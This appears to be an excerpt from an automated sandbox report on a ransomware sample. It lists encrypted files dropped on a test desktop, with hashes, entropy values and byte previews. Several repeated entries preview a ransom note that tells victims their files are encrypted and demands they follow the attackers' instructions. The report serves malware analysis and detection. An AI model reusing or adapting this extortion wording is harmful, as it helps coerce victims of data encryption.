          Preview: ...i.d ...q....N..=..x..SFt\...0.a+2W......Fc./xy+...=k.......<6....{...x.O.H....e[C.u3.....b6y.~../7N.:.f..\d..|..n...G9....x..K.Y.p.$F.......g+)H.n>....Q&<f.-.(.\.:.t.'^.X..`.#...e...bm...X....;...]G.!Z|..f.U.....t.......O.....U./q... ......V..*...-4O.(..Po......N...s$.A..Z.p'..j....._....v.4@.....:...<.....I..u...wN.$q....`.\.+._u.....s...k.....)GA..-.fD|.Z....Qy#*..;..FW..w.....h-.O..j.W(FQ...@2..sg+.....v..K......+~.!\....l..#......i...qOQ..>.....'_Jd7.;1/.B.Y/.{.o?t....,...........n....e..rm.A...yq.}t...2.l......zi..E..........b...m5p..Hx?.(^..@.6.2...I....D5.e.q...._...S[.w\M.Y2.ML.q.......~.4%G......a^B9.....B..^.s.}....>..(..6zw~.w.F._.I...|-.\.....6.:.j2...D.._h..k..Vj.p......b5..Z/.O'..&..g...KL.r......s..,.g..4....4.J.]..3...../.....<V.%.......5..P#.&.....umu.X.mY.....#.....-.........). ..T.S.BE..._.].80.D.......^N@u..;..V....P...(=....Xt.Z8..u..v!.=.1v.Wd..e..z.eFnq?,...)...&<..G..(..}..x..P.E6............b.c..w .A?43j....ls.}...T..
          C:\Users\user\Desktop\PWCCAWLGRE.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.845358229379643
          Encrypted:false
          SSDEEP:24:L5GXHW0uxYglchnZroRnespgx4XADn+zZ:wg2hnyRnestu+9
          MD5:B0A4FD2CC15598E584EEF0147A06C042
          SHA1:4020EFFCACBFBB4DB98D97A81DC36B2D2447FF5E
          SHA-256:27B365FA167018958BF1417207F221CD77441D8A11D0FA757E4B32FA0907131D
          SHA-512:FE1F628772FB063D584CDF42FA51B857C43BA20A0DAEE53BD6E44F3F7A095EE5BCFFA84A33A3B9FDC60F510A5ADDD6E5DD5E5AF635AB61103DE654B6674F76E6
          Malicious:true
          Preview: .&..6.X.o<...H.,..zvp.....q"a.....!.`.*.(..p....E.6]..A...W................6.<.hQ......2.e..5...G.....7.N....I...9....A.T#k..z...-..;.M.p.a....[.jn.].\r...Z...A.P.).J.._vA.)W.r...QX.0t....=....P.......$\,.0.r....H......OY.&[...q..Q...7i...hK3AQg1...d;q.Pj.............8z{.j..;..o-.+.G.4%#x..............%..5...:7w.A.W.{.$....v..T...|.*.V.sm..R..V.Y.K.Y...a....&fEj.T.$.!..E....ev..*..b2..>t..yg6T9..q..Ow%.C..>.k.-m.Y8.mi..X......g..Q..dm..2Q...m..[.....N.sz..^.....6.b..>~x..KAWN.~..........]_..+0U.L..FO'.{FW.,..M.A.fU{..k+..>U....yaW.q.O,...J3.UV....U..qo.TQe6.XF.&...O..41..Z..4..Zs.....l..p...Q.7.[.$..u.p..Z.....^...b..hQ...W..a.#.h.g.....X..%.#...R.um}C..8....H.....A\..q..1..U:...z.h}......B|..\..;..uP&....}.]...KK.......g.1,..$i...^j..\..;..1...........%M..+.ZF....O...;t-..B....}....M.^pFf|c....^.{.1V.%......!...`.->.!.:.......p......f.....6......`.^.:TV.@...v..=o....{._.k..l.-Kw.2.........jV.....s.....v..Z.........+8u....[.t..K.9MD)E....w..
          C:\Users\user\Desktop\PWCCAWLGRE\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\QCFWYSKMHA.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.875238228486163
          Encrypted:false
          SSDEEP:24:F+08rdiwTCrPiRNTQ9JDs95otfXza2EAerJ1h5XADn+zMU4:38hMrP0NiDsQthEAet1nu+Iv
          MD5:AB33E7CD149A433DC875E5F807B6F83E
          SHA1:D0A7F1E66346D442B8389AA177AAB70405D1F2A9
          SHA-256:8AD2962DDC26F061FE2522E4BE4961ADBD73DD3243F57FC2776435F219CAC1CD
          SHA-512:FEE22EA28E18CBE3739F00774F6740A60FF7355F180B1EA82916F13B6CC7CBAEBEBA0FC3D3CDC7CAD837AE9E58C6BEE119D3F27C470A32E6FB061E7A8CABFC34
          Malicious:false
          Preview: .}....F"l..*h...]...E..(........L?..........%g......D.. y....}.8...lM.I.$m#m9p~.86. ....KY.uv&).....yQ.0.....M...8......'(..(....f.<>.a.A./.......M...'i......b..]T..+.}m.......$....9..'..y...%.....I...p_.m[/.s/..".......B..<...(n......~.{w.A;I.......} R....lE..(C%.:%..=.a...........}N..;.mjH.s8.......>....M.......w.7.-.....#7.7.-_.}.t>......Be...B...'.5z.o.]..{D.+./<.....R...Ur....2.Q.......a\D........7tLF.$-)....y...-.co...4b!..R.].T.5....\.[L...8..T...+.I8.;..o...4...i.&..G[..q.x...d..=..TB..M:P..<..k......I....8C...Zx.M.D...2?FS....;.'.~...:.&W.....#._{...].......G...2F...h........{.aE..+e0..8...n.)..i.c6..m......q-.r$.".^.x1.3.j.R.G6L.......<...M.w..V......4.9.u...u.h..Cq..X{..?..?.%9....D... d.I..:/....c.:...s.V.._|.<./g..d.Gg...........X?..@J...Z....E.s6[u~....R...V.:...X]...j1.X...dP5.. ..aG..!../Ud....L.-).\yS.I.C...3.B.....U.lH..Y.."......d..._.](.....=f$.-?..B..4..!..M...... 2..n..#.1@.P.S(...../..t.c.X..B..bE"U>.... O4.V.tm#
          C:\Users\user\Desktop\QNCYCDFIJJ\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\SFPUSAFIOL.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8462724480384844
          Encrypted:false
          SSDEEP:24:JvN2PN/7qvSOMHSJQj7uLnqRbHcDS9Dgjs/XADn+ztgrO:Jv8PNzq6fqQjjRb8wGUu+pkO
          MD5:1A2336EB8C69254CF9C753BAB84D1D52
          SHA1:9566CBDFEB607B9B9E4C103B6B18A3A62BE2408C
          SHA-256:39E7F00F8EC3C9E7DE7E0F1C2814F940BC1FAAC25DB80AF5C20825CEFD005392
          SHA-512:8198014E32997CCD5CD51FCAE07833AAC9F2AADACF037FDD1032306807340A159177B13AA186DEEEEF40A4A4EE4AB07637687AFD8219CD3720BD9D55BB2AD917
          Malicious:false
          Preview: x...k.m.1...w.F...@....B..-NN.d.k...{..>M.p....\.}FU.ix...YH....LL......C..X...\l...I..$......A...... .T=.@{if&......9.S..:.9...Oka....:...u}..=..l...S.<.#..)..;&...~.E|..{..3.5V=........F.;.T.'..U..=.x....l..L.a.}a{.;B!..Z...h>...@T....3.q.~.j_.%..........%..\r.X...).>...^.......FGI....fU.+..w..K+..~...~7.U........P....<....W..-..U..LbJ...@.ii.Q./.nOW..#.........J......4.E...e.wL.>v..Pk..7NL._}.H..j-.c..j....(....wic.z..gzE..W..yg._..=..(..R^.J..IS.=t.`.......u5J...JS..]...i$aR...d..P>zT.C.......O...s..h.9..?{..)|.L.......yD......V.+..0..i`....A......R.Jx.....-..-{../........HM.S....f.{ZK{I.`.7..$.~.@.m.W..X.x.0;.4.C.cLIm.i...+..%..H. ...h....u.....0{....#.p.v..>.5.z..j..n..*....Q..J..yMI.\.P@q{.@[...^.JD...".@.ysr.G'D......:~P^........L.S.".5.....v..n....5...SK^.J...$.H/....K.......g\.h.64.g.;o...m.....j>...x.......:....+p.L..C.H.YjfFq..f..$.b..A...(..n.....p.....d..h.......K H....9...i.JT.-.43.V/O........k9.NF......"........h{..'..
          C:\Users\user\Desktop\SFPUSAFIOL.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.828719984393646
          Encrypted:false
          SSDEEP:24:T1uf7CUs+OC81i31yBu4d5hPrkaMiBcdNV+DTBEs93KF5HXADn+z4ZYj:0f7CUsVLQ0Bu6n43GcdNzGKFlu+sZO
          MD5:39FC0497CBCBCA919EC449C4647FAD66
          SHA1:A628B8A8E32E31615C1E0F3E63CAFF2355633F50
          SHA-256:800F2BED6551EC7A3D33DF74E25A1200337C1635F9CEDE73866AB83BEE0C1A4D
          SHA-512:8191FF2E5C37980DC5514CD80686DA581B637F61E52CCA3EB36618DE123D6A7FEA0FA4207E8B3E7D97A8ED599EBAEF36AC3F7E91053FEC9456B8DBE060B6A85D
          Malicious:false
          Preview: ..m7xI+......@7..B.7.6j[..X......";..hP....(..j..o.;.6.r.d}]2.0sp2.A~.k..h.B..I?.J..|2....)....8.q...........@....Y=5..>Wh{.........*...wE.qI..D.D..`.....;....i.....Q.....SB....0..F;.9%ws......V?.=.}....|...h.r.!Asa..X.# R..p.ru..!.`...AR...}|.z8z.N.t.f.......D.`.].\{9.].X.....4..~........7.Pif......7.....%v..`.dlce+(.Tm..`.....3+xPu....<[da.wc...I.......S..NA..;..W...L.b.....f...6.."$......lR.@....`3{..%..;._..N...."...!.."..ox.C.[u...J....E.3.........!.%...7M..V.....N......-..G(X...yB.>.f.L......Vmm.{...Y....:..hp...T.....C:wl.sdx.yt.J..pP^.(.Vh?.&.n.V-;....P...:....Q.XFE.....<CT.....3n.`6U,.T...o..dn.{MV%.:..z.9......4.....s.}X..E...Z.X....+.....D:y..w8.@.nZ3j.i~.`....2v....x.H........C.W.#S..=...6...+.s..b\.2..s...N...[.|{....m.Y..Ed...B.AO_d.G.E.....A....u.N.$..53...+b..}.<..&..h..S*..D#... ..R..J...]8..a...0.?.{.L.)..].......l..b..>.^{.M5.......3..8...).SFO...x.|L..f...^W.........1.......#:v.u..^..=|...l.2.#...O....j..
          C:\Users\user\Desktop\SQRKHNBNYN.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.839612869093501
          Encrypted:false
          SSDEEP:24:GU/zyFnCcrZCAOfmMdrpDvBlnqXDSuH/cVOxWRoy89qHXADn+zfhr:GU/2CcFCAar5Jlib/4OxWnsyu+jJ
          MD5:BB7E261BD79C6C6E201375D59E1440C4
          SHA1:0472B27D1685456515E70E3CBA88B751998203A0
          SHA-256:99AFC292D11CE8BC1C52812BD7D917811F5744782CA42CD758A81210555487A7
          SHA-512:0AF2E8AE8E64E2E15A153AC7150DA89352E7257D14CB6F0EAE54B38DD185554CB4AB50E4BE2712D6CFAC48DA388DA3B357DF505A7242CCC76E4A2A20961857AE
          Malicious:false
          Preview: h.);....%!;|W........bE}m...t..........h.q....F..cf...o.Z{......1....96....?[..4x.H^....FutX)..3s.`%flV.+.ku...~.9.H.)Z..W.....b.......2..WFn.0.Ep......B......m. ......uS..t.W.]c.T.5..V..(.!.o'.)Q.......i.{...x..S....Me...1.[uML.q.B.p..T.sv......S9Fo..*..W..O..n.`....Z(.~....C.IJ,..~...Kai.j...c.}..3Z.3.r.G.U..... .k.WW....V.......t..i..lU.u...........$d. Q$.rH.r..r.<.......UN..A.>.....p.;..A.......<`...\.....(..7U..P&z......=1...."...i.....BsV?b.<...6C.g.0......e..j.S...>.W...t..&.$>..!b.Z....sh.y-..7.xx...`.=..S...YQ.[.).......Q.}6Z. ..m..q#0..a.A\...lp.. .#h..#.;|Qu..C.^..~\..,...-.........(...Do..i..t._.$Q.....:.@3..I"c-...........;..).ny.Kw..M^&&j.e.,2...-.Y..|@n./9..)@/......+../\.7(>1...X.Y.H}.L......U...=....*.J2..>Z.......K......gN....ok,b.....C.7E'l..A} ^.m.}./...'!...4...7.T...#.tM.....4N...1^..+?..K..p..|m...h.....I..h..........V...(...uA..n....qs.1..\../.....}.....td...p$.q...^..k...~*...rj...ax....4..*.6.._#
          C:\Users\user\Desktop\SQSJKEBWDT.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.826010945098069
          Encrypted:false
          SSDEEP:24:8yrMK0qhVx+OVAFywQ4gokusFW3BvkAi0DFSpC28eqrJoz+KUyl+EY2XADn+zW3:vrMK/NVQywQxoEFMvNiM99N/yl+Yu+K3
          MD5:E897EBC1B148A4C5ED28573673799296
          SHA1:4D9E71A2AEC9F99B3A87C84F4FC04707D6543357
          SHA-256:48E276D9973A647CC44FEB15B31DC3880BB036EF799350C81B5CDBA662283A3B
          SHA-512:FDB4B92B193DDBBC33C556BDB577E416E81D987E16B83C7DCBE0504483C46479651957B3B1F7BD2894526AC9182B6B55D19DEA13CE2AEBC214688C5979BB2287
          Malicious:false
          Preview: Vu....h.l^.=vz..q2.....o.%E..5.....o.T.]...c.9]..@..../....:_..........g.{.4....0.....l.+..@..>...,.w....5.D7`P?}.C..t.y.. .z..... ..o~...@.-D.....r%...1.1`..[.3......#.y...F}M....<.N.0...^q./..d..y\..R'=.9..8.....>.n-<@..!.e........B..P...}y...*...Y&n.>....@^.z.<.tS.............xT...0.F[K.-.O~.........j.......E.".A.[.W...!vX.+......{..r..B...vds.c4.74&.Rb.....K./.@.....([......S\.u.P=w$.=.Y./7=.SD.z$4.K..-...R.Uh>.4..... ...(.D.b..R0...J(.P..#6.{HO.J......z.f.h.i.T....yD.p....>o.=...4..FJ..}^t....~.8.M.J..D........)...j...#.m..A..]Q....-.$...W&`....g;C.=....-D.j..u. .u..'.2(...7...Wa..-..)..5Z..$.!\..6H.{...C...m4..~.riS-.o$..].u.:-`T.G.u....!)C;.3.;....r..8.5.N....W...t......$.....aA.7:>......@a=r.z..!*j.M...+..T-....#......,.]}..B)k...`8/7`.gC...25...+T...L..~..\... ...d...{c...<..o.......o*........{..8I......g.Y.'?.#./^..)..&....>R.$F.:s..Qx.\..\r..8...\4...rk...I....8....z.@..SH.H..Y.^.?....d[..Hr.$fY.4..+.........A.A..R..1"....x.:
          C:\Users\user\Desktop\UOOJJOZIRH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.848102572216207
          Encrypted:false
          SSDEEP:24:NV52AgNKAaX7alOpQT8Q8yD8x17XFnRpc3lKtHPHXADn+zN6fl:NV52ASy7SOKTMyD8PXFRpcI3u+p6t
          MD5:6BF7190EBD6376ACB78BF3DBA1C2042E
          SHA1:F8F3519A3ABA8D547D402D24966D5C05D8E9B503
          SHA-256:13C909E8C4A6285D2922FA3F29F0FE810B934D7508BE5DEFFEE5E6D70A958619
          SHA-512:CEA757CD5356CB07159154C387BE190C32CEA299B70CC70AC5D95382A83DF68197FF8D66D797BE3A6B3E57BD2E2A177010054478630FF556B8AF537F6300624F
          Malicious:false
          Preview: Nj.."V.Y..^OA_.b...3..f|.M..X.vk...0@.n.......U.)P.q#\..'.Y.6/!.....J.F.......df......z.x.*oI.)WX.^..x..C..*.....sI..M.8......L......>..Z.9..a..R.n(..N...E,!...].}.H..U.8!..t.P.c........ri$K...y.{.P.q.............Ry..:...o...V@.x.....eh....ED.Q{.]..,........I.d...%.~..c....uq..J[ U!f.#..I...}'........j......./..!......6,aN..{..1..!.......I.......^....CD..Ah.G..."..%yl.6;L.../.s..P....xb.F.2.x..wr.!.....$..[.....h.Q1.*..nZ..d.......P.......8....h..2f......_.z.5.J.r.J....c\.....\.F.2.. .mgxS7(R.T.^Yi...q..*...8s g.....lg.4h.....:.q..I...X.Gx....K.".i..(...........K. !...G...s..ZZ.....!+......Q2...S+.q_&.$......E.c...pB..S..R.e..>B....z./..,.Wg&.(,..9......:.\...3=.......n.....2Y.....f........`2.......>O..*..Y4>J.T...d.h...h.s.....1.%..]\.4.4..IQ7.$.g..7n.!......Os.f.v...=zXs\*a....O.@Mu.n2E..)."..).^k.. Y2. .uE......:f2..{DeA..5n3.%U.Hh..+..F...B...K.v.h.9...F..F9*...-.#*.....N.O... m.Z..H......":..].T...B?..v.~0.ZGT..u.1.Ki...[..=l....!...(
          C:\Users\user\Desktop\UOOJJOZIRH.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.824754931739691
          Encrypted:false
          SSDEEP:24:KnrdMC57+wIdniXhqNoiOg7p3BpfFjLI+W/7rCn6PuDDflXADn+z9K8:ydMY1IiRw7px/w+cr46PuDDfRu+Zf
          MD5:7C115EE12078ECA32407AB5EB5870BF6
          SHA1:994EA32900871DD514D822010209438E3AF77C6E
          SHA-256:5D3A8A48AACB912E862C9D576D448BC7190711217C5C1BD6EE0B6DB0AD90F002
          SHA-512:746F879DD450C7AD421666208B1A7CA4491D72F39BBF014D7ACD8C8AE01A86783190D4FC5F459E6A54AB50E8E4F459017496AA756695BB8EBB1F2C07A5DAEAEF
          Malicious:true
          Preview: ..2%.....O..M.J.;...l..........Y.....G,..=..........O.+.^U....z...y.UF.....7t...k.L.g.e......8.%q6.A.`..Z...N..F....;...C.........N..&~.^O.IF.z.s...3.r{m.t..c.s.y.0....h...P..m)..NQK..l......16dQD..JWe........K...H..>W.Xq:.&....K..G..l$..o...F....R)..2G.8.CD..j.A....+.&...s.o..1.OT....9$X....)..P.qO...._H..R..bA!....!.6c.].......T.....M...o.5d.EA6.,...V.j.1.o..U...zy... .A~....]#...Nq..*iJ.....M.%k....j..i.xC.....w. .b...a.....9,t8...1l.....Y...Y..9.:..RP.G.c.... W......hY.`...y...<.X.D.M..i.O'.z.<..;s.............c_M.c...6..h..%..}......]i........8.0.3.6..........~..9h..(G,.Fz).G.Q.....J...V.r.M...v...........VDb.h.R.b`..u.O.QI...?..s ..H..v.j<..!z..i....~....M..x./+^...ye..Gr..x.>f...kTk....u......A.....u..u]..].$.._W.$.[6c...S..U3....[.Me<...8..$W..\.M.d...R..]..HT..)..Zmj|.....n..(Td.3~.!....?3.V..\5.._..........,![~.^.9.......xS.s....e.i..x.....I=I]..Hc..._I.([..-.."z..t-.9.bc..Mv.2...}.!.8Z....t]V.]...K......#....>v
          C:\Users\user\Desktop\UOOJJOZIRH\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\VAMYDFPUND.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.848977833322646
          Encrypted:false
          SSDEEP:24:y3zLlvlkCqlr70Z0DjFIVQK8luwvMghT5Abe+XADn+z0:yFv+C4ZDjFIVQK8luwvBeeiu+w
          MD5:4DE5CE7D22C863E5FE85AE736DD85596
          SHA1:C4F9F7B1DFE70D13811462980A86476CD575218C
          SHA-256:6EF8146F5039BBA07D4D28B22B79567258F707EE061443EA2810C5E144047F40
          SHA-512:175FF8B5F70E6E8A43F52163AAE09821E1E489FD6E2BE02E12F2CEB4C48401A9BB353EC89BFC56F4EB283007765F7D6D5B8E91A2B816D291FD6C695E79268D9A
          Malicious:false
          Preview: ...~.Q%.lxV".....QU.XQ......;........mi...Y....P.P.......].U24 Dxd.0..U..~.,:.p8.'....?1W...Q..4.y.......y...v.!%Z:g.....a.._ZQ..._.y....?....T...0.[X0.H[)..Q8!..2.....+~n2.a..R}.B(=.MS.......,..b.x..{...&.o....?.....7.>.P..;.......|...th,...C.q.D....F..[.8.~..A..%*...YI.!}..7...L....W..v2. ..&...59%Rn.f.Y....).W.z4.}H.>.>..I..........!.+.~.O.x.2...y.Q.......;.d.0"(q.;...G/..b~....1X...!..*."...wlf.[J.5.#wq0-..Y.8.v...~....>[2.!..*.:.k....2&..0..V...9Rs..U^]..0..W.4.l...#.]6...mj....x,..-.5:....._%....(..5.N.........D...ci.xp./.(.......F...O .5[...}i......?Qq..y...N..J}....j@B.....Z.;u..U.h%...F.....{....K# ..*r.)..2.+J..b.#.J{.F....7.%h........l.94..B.*M.e........g;:(.6-.H.@...e1Ia.p..!0#...P.F.g...o....b.,.=P.t.....'Z.}.D.kW..=O.D.`,.........j.sI...9}..J.xT.N..f.d.....pn..T....i.Q{.#.{0d....|.d....._.k./.Z.!.&0..x.D#..x.IQ7.a..^..{Y.].g^.[...-$....Gt..7.F..G?..1ui.1.Lz.8.q......,..X.,.efNvB.`..B..(h.+.7..P46.[2U..Co_..\..4......Fi...
          C:\Users\user\Desktop\VAMYDFPUND.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.826502793750154
          Encrypted:false
          SSDEEP:24:kEfzr/YBZsr2HFrFc2atxaGtR3IGzicQmXADn+zE6GrA:kUzr4g2jZatPRXecQau+xGrA
          MD5:DDA7DBCE977F645F09FC68C9615AEBFD
          SHA1:653366BA45928AA81BE834DA70C0BCF1FBCCB35F
          SHA-256:AAEE8F098350A0C04235CF88FD7249424328875273F45E7AF077DDE4A7364529
          SHA-512:8810B9A40698EB398A1A199488D0DBF8D4517E68E5D4D4219E7E414BB7B0EB339AE525895CF127C500800C080D98AC012722EA75286D52E39DE7047D3E3118C8
          Malicious:false
          Preview: ....F.!.k;....r.w.....Y..Io...?.."C......e.a.7.G-..<...RH_..f...Hv.z......&...w3.m].CL..](..r..G9...J.[.....^`( .N9.c.M...Zu....y...4..p.!|P..?p.*`4."..N.....B..$1......g.*...a.. .j.A.U?.t2.,o.O....)..%./....65..v.0.......JF..q..a.H`..}.P...aorM....F..K.....JwE.w..x..V.*...j.=]X..Tb..N.U....D....>$...u.9.W...`-.(..<.-.<...8c...0G=..X.}Zn.N."kI.8.T>...H.e..>U.. q6Cp..'...9Q.}....Bb&._gO.C.......OBD..r.."...P...r.Lq..NE..G......d.6..?!.z+)..V....H.........K*).. t`&7......9`7_.(:.;.S..e.......U.D..@.I..(,..,...JdS'.....M.N.;..\..)....(.<.....]...? .+I..C .\...6Qe.....kw....Y.9.E]...b.5.T.Z..@...s.....i..;...S..W.Y.\a....:.7O...sq.......l.....so...-.e ...`u.....,.(.U...F..W.zC}..n..G..B..K.F.6..#Z.E. 